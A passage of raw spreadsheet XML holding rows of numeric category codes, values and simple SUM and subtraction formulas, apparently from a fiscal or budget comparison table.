      <c r="AF602" s="12">
        <f t="shared" si="279"/>
        <v>19</v>
      </c>
      <c r="AG602" s="12">
        <f t="shared" si="279"/>
        <v>12</v>
      </c>
      <c r="AH602" s="12">
        <f t="shared" si="279"/>
        <v>6</v>
      </c>
      <c r="AI602" s="12">
        <f t="shared" si="279"/>
        <v>0</v>
      </c>
      <c r="AJ602" s="12">
        <f t="shared" si="279"/>
        <v>21</v>
      </c>
      <c r="AK602" s="12">
        <f t="shared" si="279"/>
        <v>37</v>
      </c>
      <c r="AL602" s="12">
        <f t="shared" si="279"/>
        <v>0</v>
      </c>
      <c r="AM602" s="12">
        <f t="shared" si="279"/>
        <v>0</v>
      </c>
      <c r="AN602" s="12">
        <f t="shared" si="279"/>
        <v>10</v>
      </c>
      <c r="AO602" s="12">
        <f t="shared" si="279"/>
        <v>8</v>
      </c>
      <c r="AP602" s="12">
        <f t="shared" si="279"/>
        <v>6</v>
      </c>
    </row>
    <row r="603" ht="18" customHeight="1" spans="1:42">
      <c r="A603" s="10"/>
      <c r="B603" s="10"/>
      <c r="C603" s="28"/>
      <c r="D603" s="10">
        <v>2080801</v>
      </c>
      <c r="E603" s="16" t="s">
        <v>3422</v>
      </c>
      <c r="F603" s="14">
        <f t="shared" si="271"/>
        <v>253</v>
      </c>
      <c r="G603" s="17">
        <v>20</v>
      </c>
      <c r="H603" s="17">
        <v>24</v>
      </c>
      <c r="I603" s="17">
        <v>20</v>
      </c>
      <c r="J603" s="17">
        <v>38</v>
      </c>
      <c r="K603" s="17"/>
      <c r="L603" s="17">
        <v>110</v>
      </c>
      <c r="M603" s="17">
        <v>21</v>
      </c>
      <c r="N603" s="17"/>
      <c r="O603" s="17"/>
      <c r="P603" s="17">
        <v>25</v>
      </c>
      <c r="Q603" s="17">
        <v>39</v>
      </c>
      <c r="R603" s="17"/>
      <c r="S603" s="17">
        <v>20</v>
      </c>
      <c r="T603" s="17">
        <v>5</v>
      </c>
      <c r="U603" s="17">
        <v>19</v>
      </c>
      <c r="V603" s="17">
        <v>38</v>
      </c>
      <c r="W603" s="17"/>
      <c r="X603" s="17">
        <v>89</v>
      </c>
      <c r="Y603" s="17">
        <v>21</v>
      </c>
      <c r="Z603" s="17"/>
      <c r="AA603" s="17"/>
      <c r="AB603" s="17">
        <v>15</v>
      </c>
      <c r="AC603" s="17">
        <v>40</v>
      </c>
      <c r="AD603" s="17"/>
      <c r="AE603" s="17">
        <f t="shared" ref="AE603:AP609" si="280">G603-S603</f>
        <v>0</v>
      </c>
      <c r="AF603" s="17">
        <f t="shared" si="280"/>
        <v>19</v>
      </c>
      <c r="AG603" s="17">
        <f t="shared" si="280"/>
        <v>1</v>
      </c>
      <c r="AH603" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AI603" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AJ603" s="17">
        <f t="shared" si="280"/>
        <v>21</v>
      </c>
      <c r="AK603" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AL603" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AM603" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AN603" s="17">
        <f t="shared" si="280"/>
        <v>10</v>
      </c>
      <c r="AO603" s="17">
        <f t="shared" si="280"/>
        <v>-1</v>
      </c>
      <c r="AP603" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
    </row>
    <row r="604" ht="18" customHeight="1" spans="1:42">
      <c r="A604" s="10"/>
      <c r="B604" s="10"/>
      <c r="C604" s="28"/>
      <c r="D604" s="10">
        <v>2080802</v>
      </c>
      <c r="E604" s="16" t="s">
        <v>3423</v>
      </c>
      <c r="F604" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G604" s="17"/>
      <c r="H604" s="17"/>
      <c r="I604" s="17"/>
      <c r="J604" s="17"/>
      <c r="K604" s="17"/>
      <c r="L604" s="17"/>
      <c r="M604" s="17"/>
      <c r="N604" s="17"/>
      <c r="O604" s="17"/>
      <c r="P604" s="17"/>
      <c r="Q604" s="17"/>
      <c r="R604" s="17"/>
      <c r="S604" s="17"/>
      <c r="T604" s="17"/>
      <c r="U604" s="17"/>
      <c r="V604" s="17"/>
      <c r="W604" s="17"/>
      <c r="X604" s="17"/>
      <c r="Y604" s="17"/>
      <c r="Z604" s="17"/>
      <c r="AA604" s="17"/>
      <c r="AB604" s="17"/>
      <c r="AC604" s="17"/>
      <c r="AD604" s="17"/>
      <c r="AE604" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AF604" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AG604" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AH604" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AI604" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AJ604" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AK604" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AL604" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AM604" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AN604" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AO604" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AP604" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
    </row>
    <row r="605" ht="18" customHeight="1" spans="1:42">
      <c r="A605" s="10"/>
      <c r="B605" s="10"/>
      <c r="C605" s="28"/>
      <c r="D605" s="10">
        <v>2080803</v>
      </c>
      <c r="E605" s="16" t="s">
        <v>3424</v>
      </c>
      <c r="F605" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G605" s="17"/>
      <c r="H605" s="17"/>
      <c r="I605" s="17"/>
      <c r="J605" s="17"/>
      <c r="K605" s="17"/>
      <c r="L605" s="17"/>
      <c r="M605" s="17"/>
      <c r="N605" s="17"/>
      <c r="O605" s="17"/>
      <c r="P605" s="17"/>
      <c r="Q605" s="17"/>
      <c r="R605" s="17"/>
      <c r="S605" s="17"/>
      <c r="T605" s="17"/>
      <c r="U605" s="17"/>
      <c r="V605" s="17"/>
      <c r="W605" s="17"/>
      <c r="X605" s="17"/>
      <c r="Y605" s="17"/>
      <c r="Z605" s="17"/>
      <c r="AA605" s="17"/>
      <c r="AB605" s="17"/>
      <c r="AC605" s="17"/>
      <c r="AD605" s="17"/>
      <c r="AE605" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AF605" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AG605" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AH605" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AI605" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AJ605" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AK605" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AL605" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AM605" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AN605" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AO605" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AP605" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
    </row>
    <row r="606" ht="18" customHeight="1" spans="1:42">
      <c r="A606" s="10"/>
      <c r="B606" s="10"/>
      <c r="C606" s="28"/>
      <c r="D606" s="10">
        <v>2080804</v>
      </c>
      <c r="E606" s="16" t="s">
        <v>3425</v>
      </c>
      <c r="F606" s="14">
        <f t="shared" si="271"/>
        <v>168</v>
      </c>
      <c r="G606" s="17"/>
      <c r="H606" s="17"/>
      <c r="I606" s="17">
        <v>43</v>
      </c>
      <c r="J606" s="17"/>
      <c r="K606" s="17"/>
      <c r="L606" s="17"/>
      <c r="M606" s="17">
        <v>88</v>
      </c>
      <c r="N606" s="17">
        <v>37</v>
      </c>
      <c r="O606" s="17"/>
      <c r="P606" s="17"/>
      <c r="Q606" s="17"/>
      <c r="R606" s="17"/>
      <c r="S606" s="17"/>
      <c r="T606" s="17"/>
      <c r="U606" s="17">
        <v>32</v>
      </c>
      <c r="V606" s="17"/>
      <c r="W606" s="17"/>
      <c r="X606" s="17"/>
      <c r="Y606" s="17">
        <v>51</v>
      </c>
      <c r="Z606" s="17">
        <v>37</v>
      </c>
      <c r="AA606" s="17"/>
      <c r="AB606" s="17"/>
      <c r="AC606" s="17"/>
      <c r="AD606" s="17"/>
      <c r="AE606" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AF606" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AG606" s="17">
        <f t="shared" si="280"/>
        <v>11</v>
      </c>
      <c r="AH606" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AI606" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AJ606" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AK606" s="17">
        <f t="shared" si="280"/>
        <v>37</v>
      </c>
      <c r="AL606" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AM606" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AN606" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AO606" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AP606" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
    </row>
    <row r="607" ht="18" customHeight="1" spans="1:42">
      <c r="A607" s="10"/>
      <c r="B607" s="10"/>
      <c r="C607" s="28"/>
      <c r="D607" s="10">
        <v>2080805</v>
      </c>
      <c r="E607" s="16" t="s">
        <v>3426</v>
      </c>
      <c r="F607" s="14">
        <f t="shared" si="271"/>
        <v>631</v>
      </c>
      <c r="G607" s="17">
        <v>44</v>
      </c>
      <c r="H607" s="17">
        <v>97</v>
      </c>
      <c r="I607" s="17">
        <v>67</v>
      </c>
      <c r="J607" s="17">
        <v>116</v>
      </c>
      <c r="K607" s="17">
        <v>77</v>
      </c>
      <c r="L607" s="17">
        <v>98</v>
      </c>
      <c r="M607" s="17">
        <v>56</v>
      </c>
      <c r="N607" s="17">
        <v>52</v>
      </c>
      <c r="O607" s="17">
        <v>45</v>
      </c>
      <c r="P607" s="17">
        <v>68</v>
      </c>
      <c r="Q607" s="17">
        <v>46</v>
      </c>
      <c r="R607" s="17">
        <v>6</v>
      </c>
      <c r="S607" s="17">
        <v>45</v>
      </c>
      <c r="T607" s="17">
        <v>97</v>
      </c>
      <c r="U607" s="17">
        <v>67</v>
      </c>
      <c r="V607" s="17">
        <v>116</v>
      </c>
      <c r="W607" s="17">
        <v>77</v>
      </c>
      <c r="X607" s="17">
        <v>98</v>
      </c>
      <c r="Y607" s="17">
        <v>56</v>
      </c>
      <c r="Z607" s="17">
        <v>52</v>
      </c>
      <c r="AA607" s="17">
        <v>45</v>
      </c>
      <c r="AB607" s="17">
        <v>68</v>
      </c>
      <c r="AC607" s="17">
        <v>46</v>
      </c>
      <c r="AD607" s="17"/>
      <c r="AE607" s="17">
        <f t="shared" si="280"/>
        <v>-1</v>
      </c>
      <c r="AF607" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AG607" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AH607" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AI607" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AJ607" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AK607" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AL607" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AM607" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AN607" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AO607" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AP607" s="17">
        <f t="shared" si="280"/>
        <v>6</v>
      </c>
    </row>
    <row r="608" ht="18" customHeight="1" spans="1:42">
      <c r="A608" s="10"/>
      <c r="B608" s="10"/>
      <c r="C608" s="28"/>
      <c r="D608" s="10">
        <v>2080806</v>
      </c>
      <c r="E608" s="16" t="s">
        <v>3427</v>
      </c>
      <c r="F608" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G608" s="17"/>
      <c r="H608" s="17"/>
      <c r="I608" s="17"/>
      <c r="J608" s="17"/>
      <c r="K608" s="17"/>
      <c r="L608" s="17"/>
      <c r="M608" s="17"/>
      <c r="N608" s="17"/>
      <c r="O608" s="17"/>
      <c r="P608" s="17"/>
      <c r="Q608" s="17"/>
      <c r="R608" s="17"/>
      <c r="S608" s="17"/>
      <c r="T608" s="17"/>
      <c r="U608" s="17"/>
      <c r="V608" s="17"/>
      <c r="W608" s="17"/>
      <c r="X608" s="17"/>
      <c r="Y608" s="17"/>
      <c r="Z608" s="17"/>
      <c r="AA608" s="17"/>
      <c r="AB608" s="17"/>
      <c r="AC608" s="17"/>
      <c r="AD608" s="17"/>
      <c r="AE608" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AF608" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AG608" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AH608" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AI608" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AJ608" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AK608" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AL608" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AM608" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AN608" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AO608" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AP608" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
    </row>
    <row r="609" ht="18" customHeight="1" spans="1:42">
      <c r="A609" s="10"/>
      <c r="B609" s="10"/>
      <c r="C609" s="28"/>
      <c r="D609" s="10">
        <v>2080899</v>
      </c>
      <c r="E609" s="16" t="s">
        <v>3428</v>
      </c>
      <c r="F609" s="14">
        <f t="shared" si="271"/>
        <v>61</v>
      </c>
      <c r="G609" s="17"/>
      <c r="H609" s="17"/>
      <c r="I609" s="17"/>
      <c r="J609" s="17">
        <v>27</v>
      </c>
      <c r="K609" s="17"/>
      <c r="L609" s="17"/>
      <c r="M609" s="17"/>
      <c r="N609" s="17"/>
      <c r="O609" s="17"/>
      <c r="P609" s="17"/>
      <c r="Q609" s="17">
        <v>34</v>
      </c>
      <c r="R609" s="17"/>
      <c r="S609" s="17"/>
      <c r="T609" s="17"/>
      <c r="U609" s="17"/>
      <c r="V609" s="17">
        <v>21</v>
      </c>
      <c r="W609" s="17"/>
      <c r="X609" s="17"/>
      <c r="Y609" s="17"/>
      <c r="Z609" s="17"/>
      <c r="AA609" s="17"/>
      <c r="AB609" s="17"/>
      <c r="AC609" s="17">
        <v>25</v>
      </c>
      <c r="AD609" s="17"/>
      <c r="AE609" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AF609" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AG609" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AH609" s="17">
        <f t="shared" si="280"/>
        <v>6</v>
      </c>
      <c r="AI609" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AJ609" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AK609" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AL609" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AM609" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AN609" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
      <c r="AO609" s="17">
        <f t="shared" si="280"/>
        <v>9</v>
      </c>
      <c r="AP609" s="17">
        <f t="shared" si="280"/>
        <v>0</v>
      </c>
    </row>
    <row r="610" ht="18" customHeight="1" spans="1:42">
      <c r="A610" s="10"/>
      <c r="B610" s="10"/>
      <c r="C610" s="28"/>
      <c r="D610" s="10">
        <v>20809</v>
      </c>
      <c r="E610" s="11" t="s">
        <v>3429</v>
      </c>
      <c r="F610" s="14">
        <f t="shared" si="271"/>
        <v>871</v>
      </c>
      <c r="G610" s="12">
        <f t="shared" ref="G610:R610" si="281">SUM(G611:G616)</f>
        <v>536</v>
      </c>
      <c r="H610" s="12">
        <f t="shared" si="281"/>
        <v>327</v>
      </c>
      <c r="I610" s="12">
        <f t="shared" si="281"/>
        <v>108</v>
      </c>
      <c r="J610" s="12">
        <f t="shared" si="281"/>
        <v>131</v>
      </c>
      <c r="K610" s="12">
        <f t="shared" si="281"/>
        <v>148</v>
      </c>
      <c r="L610" s="12">
        <f t="shared" si="281"/>
        <v>69</v>
      </c>
      <c r="M610" s="12">
        <f t="shared" si="281"/>
        <v>0</v>
      </c>
      <c r="N610" s="12">
        <f t="shared" si="281"/>
        <v>67</v>
      </c>
      <c r="O610" s="12">
        <f t="shared" si="281"/>
        <v>80</v>
      </c>
      <c r="P610" s="12">
        <f t="shared" si="281"/>
        <v>79</v>
      </c>
      <c r="Q610" s="12">
        <f t="shared" si="281"/>
        <v>48</v>
      </c>
      <c r="R610" s="12">
        <f t="shared" si="281"/>
        <v>141</v>
      </c>
      <c r="S610" s="12">
        <v>483</v>
      </c>
      <c r="T610" s="12">
        <v>291</v>
      </c>
      <c r="U610" s="12">
        <v>98</v>
      </c>
      <c r="V610" s="12">
        <v>115</v>
      </c>
      <c r="W610" s="12">
        <v>133</v>
      </c>
      <c r="X610" s="12">
        <v>61</v>
      </c>
      <c r="Y610" s="12">
        <v>0</v>
      </c>
      <c r="Z610" s="12">
        <v>60</v>
      </c>
      <c r="AA610" s="12">
        <v>69</v>
      </c>
      <c r="AB610" s="12">
        <v>66</v>
      </c>
      <c r="AC610" s="12">
        <v>42</v>
      </c>
      <c r="AD610" s="12">
        <v>141</v>
      </c>
      <c r="AE610" s="12">
        <f t="shared" ref="AE610:AP610" si="282">SUM(AE611:AE616)</f>
        <v>53</v>
      </c>
      <c r="AF610" s="12">
        <f t="shared" si="282"/>
        <v>36</v>
      </c>
      <c r="AG610" s="12">
        <f t="shared" si="282"/>
        <v>10</v>
      </c>
      <c r="AH610" s="12">
        <f t="shared" si="282"/>
        <v>16</v>
      </c>
      <c r="AI610" s="12">
        <f t="shared" si="282"/>
        <v>15</v>
      </c>
      <c r="AJ610" s="12">
        <f t="shared" si="282"/>
        <v>8</v>
      </c>
      <c r="AK610" s="12">
        <f t="shared" si="282"/>
        <v>0</v>
      </c>
      <c r="AL610" s="12">
        <f t="shared" si="282"/>
        <v>7</v>
      </c>
      <c r="AM610" s="12">
        <f t="shared" si="282"/>
        <v>11</v>
      </c>
      <c r="AN610" s="12">
        <f t="shared" si="282"/>
        <v>13</v>
      </c>
      <c r="AO610" s="12">
        <f t="shared" si="282"/>
        <v>6</v>
      </c>
      <c r="AP610" s="12">
        <f t="shared" si="282"/>
        <v>0</v>
      </c>
    </row>
    <row r="611" ht="18" customHeight="1" spans="1:42">
      <c r="A611" s="10"/>
      <c r="B611" s="10"/>
      <c r="C611" s="28"/>
      <c r="D611" s="10">
        <v>2080901</v>
      </c>
      <c r="E611" s="16" t="s">
        <v>3430</v>
      </c>
      <c r="F611" s="14">
        <f t="shared" si="271"/>
        <v>823</v>
      </c>
      <c r="G611" s="17">
        <v>522</v>
      </c>
      <c r="H611" s="17">
        <v>327</v>
      </c>
      <c r="I611" s="17">
        <v>108</v>
      </c>
      <c r="J611" s="17">
        <v>131</v>
      </c>
      <c r="K611" s="17">
        <v>148</v>
      </c>
      <c r="L611" s="17">
        <v>69</v>
      </c>
      <c r="M611" s="17"/>
      <c r="N611" s="17">
        <v>67</v>
      </c>
      <c r="O611" s="17">
        <v>80</v>
      </c>
      <c r="P611" s="17">
        <v>79</v>
      </c>
      <c r="Q611" s="17"/>
      <c r="R611" s="17">
        <v>141</v>
      </c>
      <c r="S611" s="17">
        <v>470</v>
      </c>
      <c r="T611" s="17">
        <v>291</v>
      </c>
      <c r="U611" s="17">
        <v>98</v>
      </c>
      <c r="V611" s="17">
        <v>115</v>
      </c>
      <c r="W611" s="17">
        <v>133</v>
      </c>
      <c r="X611" s="17">
        <v>61</v>
      </c>
      <c r="Y611" s="17"/>
      <c r="Z611" s="17">
        <v>60</v>
      </c>
      <c r="AA611" s="17">
        <v>69</v>
      </c>
      <c r="AB611" s="17">
        <v>66</v>
      </c>
      <c r="AC611" s="17"/>
      <c r="AD611" s="17">
        <v>141</v>
      </c>
      <c r="AE611" s="17">
        <f t="shared" ref="AE611:AP616" si="283">G611-S611</f>
        <v>52</v>
      </c>
      <c r="AF611" s="17">
        <f t="shared" si="283"/>
        <v>36</v>
      </c>
      <c r="AG611" s="17">
        <f t="shared" si="283"/>
        <v>10</v>
      </c>
      <c r="AH611" s="17">
        <f t="shared" si="283"/>
        <v>16</v>
      </c>
      <c r="AI611" s="17">
        <f t="shared" si="283"/>
        <v>15</v>
      </c>
      <c r="AJ611" s="17">
        <f t="shared" si="283"/>
        <v>8</v>
      </c>
      <c r="AK611" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AL611" s="17">
        <f t="shared" si="283"/>
        <v>7</v>
      </c>
      <c r="AM611" s="17">
        <f t="shared" si="283"/>
        <v>11</v>
      </c>
      <c r="AN611" s="17">
        <f t="shared" si="283"/>
        <v>13</v>
      </c>
      <c r="AO611" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AP611" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
    </row>
    <row r="612" ht="18" customHeight="1" spans="1:42">
      <c r="A612" s="10"/>
      <c r="B612" s="10"/>
      <c r="C612" s="28"/>
      <c r="D612" s="10">
        <v>2080902</v>
      </c>
      <c r="E612" s="16" t="s">
        <v>3431</v>
      </c>
      <c r="F612" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G612" s="17">
        <v>14</v>
      </c>
      <c r="H612" s="17"/>
      <c r="I612" s="17"/>
      <c r="J612" s="17"/>
      <c r="K612" s="17"/>
      <c r="L612" s="17"/>
      <c r="M612" s="17"/>
      <c r="N612" s="17"/>
      <c r="O612" s="17"/>
      <c r="P612" s="17"/>
      <c r="Q612" s="17"/>
      <c r="R612" s="17"/>
      <c r="S612" s="17">
        <v>13</v>
      </c>
      <c r="T612" s="17"/>
      <c r="U612" s="17"/>
      <c r="V612" s="17"/>
      <c r="W612" s="17"/>
      <c r="X612" s="17"/>
      <c r="Y612" s="17"/>
      <c r="Z612" s="17"/>
      <c r="AA612" s="17"/>
      <c r="AB612" s="17"/>
      <c r="AC612" s="17"/>
      <c r="AD612" s="17"/>
      <c r="AE612" s="17">
        <f t="shared" si="283"/>
        <v>1</v>
      </c>
      <c r="AF612" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AG612" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AH612" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AI612" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AJ612" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AK612" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AL612" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AM612" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AN612" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AO612" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AP612" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
    </row>
    <row r="613" ht="18" customHeight="1" spans="1:42">
      <c r="A613" s="10"/>
      <c r="B613" s="10"/>
      <c r="C613" s="28"/>
      <c r="D613" s="10">
        <v>2080903</v>
      </c>
      <c r="E613" s="16" t="s">
        <v>3432</v>
      </c>
      <c r="F613" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G613" s="17"/>
      <c r="H613" s="17"/>
      <c r="I613" s="17"/>
      <c r="J613" s="17"/>
      <c r="K613" s="17"/>
      <c r="L613" s="17"/>
      <c r="M613" s="17"/>
      <c r="N613" s="17"/>
      <c r="O613" s="17"/>
      <c r="P613" s="17"/>
      <c r="Q613" s="17"/>
      <c r="R613" s="17"/>
      <c r="S613" s="17"/>
      <c r="T613" s="17"/>
      <c r="U613" s="17"/>
      <c r="V613" s="17"/>
      <c r="W613" s="17"/>
      <c r="X613" s="17"/>
      <c r="Y613" s="17"/>
      <c r="Z613" s="17"/>
      <c r="AA613" s="17"/>
      <c r="AB613" s="17"/>
      <c r="AC613" s="17"/>
      <c r="AD613" s="17"/>
      <c r="AE613" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AF613" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AG613" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AH613" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AI613" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AJ613" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AK613" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AL613" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AM613" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AN613" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AO613" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AP613" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
    </row>
    <row r="614" ht="18" customHeight="1" spans="1:42">
      <c r="A614" s="10"/>
      <c r="B614" s="10"/>
      <c r="C614" s="28"/>
      <c r="D614" s="10">
        <v>2080904</v>
      </c>
      <c r="E614" s="16" t="s">
        <v>3433</v>
      </c>
      <c r="F614" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G614" s="17"/>
      <c r="H614" s="17"/>
      <c r="I614" s="17"/>
      <c r="J614" s="17"/>
      <c r="K614" s="17"/>
      <c r="L614" s="17"/>
      <c r="M614" s="17"/>
      <c r="N614" s="17"/>
      <c r="O614" s="17"/>
      <c r="P614" s="17"/>
      <c r="Q614" s="17"/>
      <c r="R614" s="17"/>
      <c r="S614" s="17"/>
      <c r="T614" s="17"/>
      <c r="U614" s="17"/>
      <c r="V614" s="17"/>
      <c r="W614" s="17"/>
      <c r="X614" s="17"/>
      <c r="Y614" s="17"/>
      <c r="Z614" s="17"/>
      <c r="AA614" s="17"/>
      <c r="AB614" s="17"/>
      <c r="AC614" s="17"/>
      <c r="AD614" s="17"/>
      <c r="AE614" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AF614" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AG614" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AH614" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AI614" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AJ614" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AK614" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AL614" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AM614" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AN614" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AO614" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AP614" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
    </row>
    <row r="615" ht="18" customHeight="1" spans="1:42">
      <c r="A615" s="10"/>
      <c r="B615" s="10"/>
      <c r="C615" s="28"/>
      <c r="D615" s="10">
        <v>2080905</v>
      </c>
      <c r="E615" s="16" t="s">
        <v>3434</v>
      </c>
      <c r="F615" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G615" s="17"/>
      <c r="H615" s="17"/>
      <c r="I615" s="17"/>
      <c r="J615" s="17"/>
      <c r="K615" s="17"/>
      <c r="L615" s="17"/>
      <c r="M615" s="17"/>
      <c r="N615" s="17"/>
      <c r="O615" s="17"/>
      <c r="P615" s="17"/>
      <c r="Q615" s="17"/>
